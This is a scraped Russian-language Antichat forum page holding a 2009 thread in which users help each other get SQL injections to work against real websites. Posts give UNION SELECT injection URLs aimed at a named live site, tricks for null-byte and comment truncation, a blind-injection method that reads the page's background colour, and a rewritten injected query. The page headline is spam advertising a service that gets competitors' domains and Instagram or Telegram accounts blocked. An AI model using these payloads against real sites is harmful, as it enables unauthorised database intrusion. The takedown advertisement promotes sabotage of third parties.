УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 754 из 1393

754

Опции темы

Поиск в этой теме

Опции просмотра

#7531

08.06.2009, 19:20

~~Krist_ALL~~

Banned

Регистрация: 14.01.2009

Сообщений: 515

Провел на форуме:
1996429

Репутация: 468

Отправить сообщение для Krist_ALL с помощью ICQ

попробуй # в качестве комментария

#7532

08.06.2009, 20:02

}{@r}{imon

Новичок

Регистрация: 09.05.2009

Сообщений: 8

Провел на форуме:
44729

Репутация: 0

Отправить сообщение для }{@r}{imon с помощью ICQ

потскажите если на сайте версия 4,0,2 какие могут быть таблицы старые не идут

#7533

08.06.2009, 20:09

prescott

Участник форума

Регистрация: 28.07.2008

Сообщений: 158

Провел на форуме:
728470

Репутация: 115

Цитата:

Сообщение от Krist_ALL

попробуй # в качестве комментария

Вставил - в запросе не появляется. Подставил как %23 - появилась, но комментится так же одна строка

#7534

08.06.2009, 21:13

oRb

Members of Antichat - Level 5

Регистрация: 09.05.2008

Сообщений: 304

Провел на форуме:
7875940

Репутация: 2362

prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7

__________________
включи голову

#7535

08.06.2009, 21:28

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

Цитата:

Сообщение от prescott

Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?

маниа.ком ?

Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5

#7536

08.06.2009, 22:37

prescott

Участник форума

Регистрация: 28.07.2008

Сообщений: 158

Провел на форуме:
728470

Репутация: 115

Цитата:

prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7

первое что попробовал - не помогло

Цитата:

Сообщение от ElteRUS

Тоже уже сплоит работает =)

#7537

09.06.2009, 00:50

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

prescott,
#%0A# проверь

#7538

09.06.2009, 03:55

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

Это сути дела не меняет(перевод строки то останется в старом запросе), будет:

Цитата:

WHERE 1 AND cats.id = 145 [INJECT]#
#
GROUP BY cats.id
ORDER BY cats.order_fld,cats.name

Попробуй продолжить запрос, например:

Цитата:

SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = -98145 union select 1,(select 1 from table limit 1),3 from cats GROUP BY cats.id
ORDER BY cats.order_fld,cats.name

правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):

Цитата:

Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name.

Последний раз редактировалось PaCo; 09.06.2009 в 04:10..